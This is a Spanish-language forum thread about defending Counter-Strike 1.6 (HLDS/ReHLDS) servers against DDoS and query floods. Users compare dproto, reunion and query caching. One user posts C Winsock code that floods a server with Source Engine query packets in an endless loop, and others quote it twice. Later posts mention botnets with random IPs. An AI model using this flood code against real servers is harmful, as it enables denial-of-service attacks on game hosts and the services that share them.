Proteccion contra ataques DDOS
#26
(08/11/2019, 04:29 AM)RauliTop escribió: Por otra parte, dproto no tiene protección contra un tipo de fakeplayers y se debe usar un plugin.

El xFakePlayers de ZeaL?, la variante va PERFECTA en el ReHLDS!, qué decís?
Te puedo adjuntar inclusive yo mismo un code en donde te entren un flood a tu server con ReHLDS y vas a ver que estás en la misma.

(08/11/2019, 04:29 AM)RauliTop escribió: Exactamente, yo haré lo que me dé la gana. Pero tampoco creo que te mueras por dar una opinión.

] kill
Rainnegan dead

(08/11/2019, 04:29 AM)RauliTop escribió: Ya lo hice, y el HLDS sin dproto se come muchos exploits, ReHLDS ninguno.

Se me olvidaba. Dproto ya no funciona con la última versión de HLDS, y aún esta última versión no corrige todos los exploits que sí corrige el dproto.
Suerte a quien use HLDS actualizado.

5 mins y uala!

[Imagen: MP2GrLQ.png]

Como te dije antes, hacé lo que se te cante las pelotas, si querés usar ReHLDS, agarrá y usalo, nadie te dice que no lo haga, cierro discusión acá ya que expusimos diferentes puntos de vista por lo cual, el que hizo el TH que haga lo que se le cante las pelotas tb. pacman

(08/11/2019, 07:55 PM)Sugisaki escribió: un while estaria mejor

JAJAJAJAJAJAJAJAJ

EDIT: Había leido mal, miopía de mierda.
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
Responder
#27
[Imagen: MrEbQdGzTa_HD_QEWJTElw.png]
Código PHP:
#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

int main()
{
    
WSADATA wsdata;
    
DWORD DllVersion MAKEWORD(12);
    
CHAR szBytes[] = "\xFF\xFF\xFF\xFF\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00";
    
CHAR szIP[] = "127.0.0.1";
    
unsigned short Port 27015;
    if (
WSAStartup(DllVersion, &wsdata) != 0)
    {
        
printf("Fallo al crear el socket #1");
        
ExitProcess(EXIT_FAILURE);
    }
    
SOCKET sock socket(AF_INETSOCK_DGRAMIPPROTO_UDP);
    if(!
sock)
    {
        
printf("Fallo al crear el socket #2");
        
ExitProcess(EXIT_FAILURE);
    }
    
SOCKADDR_IN RecvAddr;
    
RecvAddr.sin_family AF_INET;
    
RecvAddr.sin_port htons(Port);
    
RecvAddr.sin_addr.s_addr inet_addr(szIP);
    while (
sendto(sockszBytes250, (const struct sockaddr *)&RecvAddrsizeof(RecvAddr)))
    {
        continue;
    }
    
ExitProcess(EXIT_SUCCESS);

me cuesta un poco probarlo, pero cuando te hacen un spoof, el proceso hlds llega hasta un 100%, no solo ese tambien un procesador de cola ksoirqnoseque de linux
Competitive/Face it Pick Up Game (PUG) servidor de prueba: 45.77.94.109:27016 Click para Entrar
[Imagen: b_350_20_5A6C3E_383F2D_D2E1B5_2E3226.png]

(14/08/2015, 10:15 PM)Sugisaki escribió: "El mundo es caotico, irracional e injusto. No tiene ningun significado"
Palabras que desde hace mucho tiempo he buscado para describir, ¿Que es el mundo?
Crab

Código PHP:
if(ayuda && free)
{
    exit();

Responder
#28
(08/11/2019, 10:18 PM)Sugisaki escribió: [Imagen: MrEbQdGzTa_HD_QEWJTElw.png]
Código PHP:
#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

int main()
{
    
WSADATA wsdata;
    
DWORD DllVersion MAKEWORD(12);
    
CHAR szBytes[] = "\xFF\xFF\xFF\xFF\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00";
    
CHAR szIP[] = "127.0.0.1";
    
unsigned short Port 27015;
    if (
WSAStartup(DllVersion, &wsdata) != 0)
    {
        
printf("Fallo al crear el socket #1");
        
ExitProcess(EXIT_FAILURE);
    }
    
SOCKET sock socket(AF_INETSOCK_DGRAMIPPROTO_UDP);
    if(!
sock)
    {
        
printf("Fallo al crear el socket #2");
        
ExitProcess(EXIT_FAILURE);
    }
    
SOCKADDR_IN RecvAddr;
    
RecvAddr.sin_family AF_INET;
    
RecvAddr.sin_port htons(Port);
    
RecvAddr.sin_addr.s_addr inet_addr(szIP);
    while (
sendto(sockszBytes250, (const struct sockaddr *)&RecvAddrsizeof(RecvAddr)))
    {
        continue;
    }
    
ExitProcess(EXIT_SUCCESS);

me cuesta un poco probarlo, pero cuando te hacen un spoof, el proceso hlds llega hasta un 100%, no solo ese tambien un procesador de cola ksoirqnoseque de linux

Dejalo que siga usando ReHLDS ...
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
Responder
#29
me hace gracia que estén mostrando un exploit del pasado en un foro donde fixean la misma jaja (bueno igual ese """exploit""" esta mas fixeado que el sedly pacman)
Responder
#30
(08/11/2019, 11:44 PM)Nube. escribió: me hace gracia que estén mostrando un exploit del pasado en un foro donde fixean la misma jaja (bueno igual ese """exploit""" esta mas fixeado que el sedly pacman)

podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,
solo imagina que con una simple botnet (y lo mencione) usando un random ip (desconozco como lo hacen) tumban el servidor entero, no un sv, todos los servidores de juegos que esten compartiendo recursos con el afectado
Competitive/Face it Pick Up Game (PUG) servidor de prueba: 45.77.94.109:27016 Click para Entrar
[Imagen: b_350_20_5A6C3E_383F2D_D2E1B5_2E3226.png]

(14/08/2015, 10:15 PM)Sugisaki escribió: "El mundo es caotico, irracional e injusto. No tiene ningun significado"
Palabras que desde hace mucho tiempo he buscado para describir, ¿Que es el mundo?
Crab

Código PHP:
if(ayuda && free)
{
    exit();

Responder
#31
(09/11/2019, 01:08 AM)Sugisaki escribió: podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,

En cuanto atacar servers, si, floodear las querys es lo básico.
Para evitar esto yo haría que si me floodean las querys desde 10 ips diferentes (más o menos), se desactiven por "x" tiempo y listo.
Igual tampoco serviría, me podrías floodear el connect o el getchallenge, y si te desactivo eso, me vacias el server ya que nadie podría conectarse.
En cuanto atacar clientes, hasta ahora el NDF (lo expliqué el otro día) y la ejecución de ejecutables en demos son los únicos más potentes (No-Steam), en Steam no recuerdo que cosas tengo...

PD: La reroducción de archivos .mp4 sigue igual o la fixearon?

(09/11/2019, 01:08 AM)Sugisaki escribió: solo imagina que con una simple botnet (y lo mencione) usando un random ip (desconozco como lo hacen) tumban el servidor entero, no un sv, todos los servidores de juegos que esten compartiendo recursos con el afectado

Che pero si el server tiene buena conexión no le harías nada.
Lo del random ip por lo general te lo ofrecen los servicios de la botnet que estés usando.
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
Responder
#32

(09/11/2019, 01:23 AM)Cr3470r escribió:
(09/11/2019, 01:08 AM)Sugisaki escribió: podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,
PD: La reProducción de archivos .mp4 sigue igual o la fixearon?
Nop
Responder
#33
(09/11/2019, 01:46 AM)Nube. escribió:
(09/11/2019, 01:23 AM)Cr3470r escribió:
(09/11/2019, 01:08 AM)Sugisaki escribió: podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,
PD: La reProducción de archivos .mp4 sigue igual o la fixearon?
Nop

@metita de paso podrías hacer otro TH en el github para que no excedan los 1000 fps ?, ya da muchísimo asco ver como players vuelan por todos lados por tener Auto-Strafes y más de 1000 fps.
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
Responder
#34
(08/11/2019, 10:13 PM)Cr3470r escribió: El xFakePlayers de ZeaL?, la variante va PERFECTA en el ReHLDS!, qué decís?
Te puedo adjuntar inclusive yo mismo un code en donde te entren un flood a tu server con ReHLDS y vas a ver que estás en la misma.

5 mins y uala!

[Imagen: MP2GrLQ.png]

El xfakeplayer lo bloquea el reauthchecker. Si pones rehlds, debes ponerlo, lógicamente.

A cual flood te refieres? Hay otro flood de micro que se protege con el VTC o revoice.

Que quieres decir con esa captura? Hiciste correr dproto en la última versión de HLDS? Vi muchos que se quejaban que les daba error por la versión, pero nunca lo probé

(08/11/2019, 10:18 PM)Sugisaki escribió: [Imagen: MrEbQdGzTa_HD_QEWJTElw.png]
Código PHP:
#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

int main()
{
    
WSADATA wsdata;
    
DWORD DllVersion MAKEWORD(12);
    
CHAR szBytes[] = "\xFF\xFF\xFF\xFF\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00";
    
CHAR szIP[] = "127.0.0.1";
    
unsigned short Port 27015;
    if (
WSAStartup(DllVersion, &wsdata) != 0)
    {
        
printf("Fallo al crear el socket #1");
        
ExitProcess(EXIT_FAILURE);
    }
    
SOCKET sock socket(AF_INETSOCK_DGRAMIPPROTO_UDP);
    if(!
sock)
    {
        
printf("Fallo al crear el socket #2");
        
ExitProcess(EXIT_FAILURE);
    }
    
SOCKADDR_IN RecvAddr;
    
RecvAddr.sin_family AF_INET;
    
RecvAddr.sin_port htons(Port);
    
RecvAddr.sin_addr.s_addr inet_addr(szIP);
    while (
sendto(sockszBytes250, (const struct sockaddr *)&RecvAddrsizeof(RecvAddr)))
    {
        continue;
    }
    
ExitProcess(EXIT_SUCCESS);

me cuesta un poco probarlo, pero cuando te hacen un spoof, el proceso hlds llega hasta un 100%, no solo ese tambien un procesador de cola ksoirqnoseque de linux
Por el reunion? O también pasa en el HLDS con dproto?
(17/04/2015, 03:36 PM)Neeeeeeeeeel.- escribió: No se va a volver a conectar a internet en toda su puta vida... nadie sube porno a mi foro y vive para contarlo.
Responder
#35
(09/11/2019, 01:23 AM)Cr3470r escribió: Che pero si el server tiene buena conexión no le harías nada.
Lo del random ip por lo general te lo ofrecen los servicios de la botnet que estés usando.

Tienes que ver el que me hiceron hace poco, pcap lo borre, mano por ese simple random ip al query el proceso del hlds se explotaba al 100% de cpu, de todas formas hice un desvio de paquetes a otro lugar donde hace query (cache) si atacan el query, se laggeara aquel lugar remoto

(09/11/2019, 07:12 PM)RauliTop escribió: Por el reunion? O también pasa en el HLDS con dproto?

ambos, el query flood les afecta por igual.
Competitive/Face it Pick Up Game (PUG) servidor de prueba: 45.77.94.109:27016 Click para Entrar
[Imagen: b_350_20_5A6C3E_383F2D_D2E1B5_2E3226.png]

(14/08/2015, 10:15 PM)Sugisaki escribió: "El mundo es caotico, irracional e injusto. No tiene ningun significado"
Palabras que desde hace mucho tiempo he buscado para describir, ¿Que es el mundo?
Crab

Código PHP:
if(ayuda && free)
{
    exit();

Responder
#36
(10/11/2019, 10:16 AM)Sugisaki escribió: ambos, el query flood les afecta por igual.

Se supone que reunion te banea, tal como sale en tu captura.
Aún así deja a la aplicación con 100% de uso?

Algo debe estar mal en la protección de las TSource Queries en reunion.
Yo que tú lo avisaría en el tema de dev-cs.ru
O el tema que no es DEV
(17/04/2015, 03:36 PM)Neeeeeeeeeel.- escribió: No se va a volver a conectar a internet en toda su puta vida... nadie sube porno a mi foro y vive para contarlo.
Responder
#37
(10/11/2019, 05:12 PM)RauliTop escribió:
(10/11/2019, 10:16 AM)Sugisaki escribió: ambos, el query flood les afecta por igual.

Se supone que reunion te banea, tal como sale en tu captura.
Aún así deja a la aplicación con 100% de uso?

Algo debe estar mal en la protección de las TSource Queries en reunion.
Yo que tú lo avisaría en el tema de dev-cs.ru
O el tema que no es DEV

yep ,son datos ,que te bannee el reunión no va a evitar que sigan mandando querys al servidor.
Responder
#38
Como que no? Sí te banea en teoría no tendria que recibir nada el servidor, ya que te bloquea la ip. En DProto pasa eso por ejemplo. en Reunion no?
Responder
#39
(10/11/2019, 10:49 PM)Niper.-. escribió: Como que no? Sí te banea en teoría no tendria que recibir nada el servidor, ya que te bloquea la ip. En DProto pasa eso por ejemplo. en Reunion no?

¿?? en el css no pasa eso
Responder
#40
(10/11/2019, 10:49 PM)Niper.-. escribió: Como que no? Sí te banea en teoría no tendria que recibir nada el servidor, ya que te bloquea la ip. En DProto pasa eso por ejemplo. en Reunion no?

imagina ahora enviar cientos de ips distintas haciendo query al mismo tiempo! en el tiempo que el sv procesa si un query es valido o no ya han entrado 5 ips mas atrás aumentando el consumo del procesador! lo que lleva al query cache como una opción mas viable!
[Imagen: 76561198090851442.png]
Responder


Salto de foro:


Usuarios navegando en este tema: 1 invitado(s)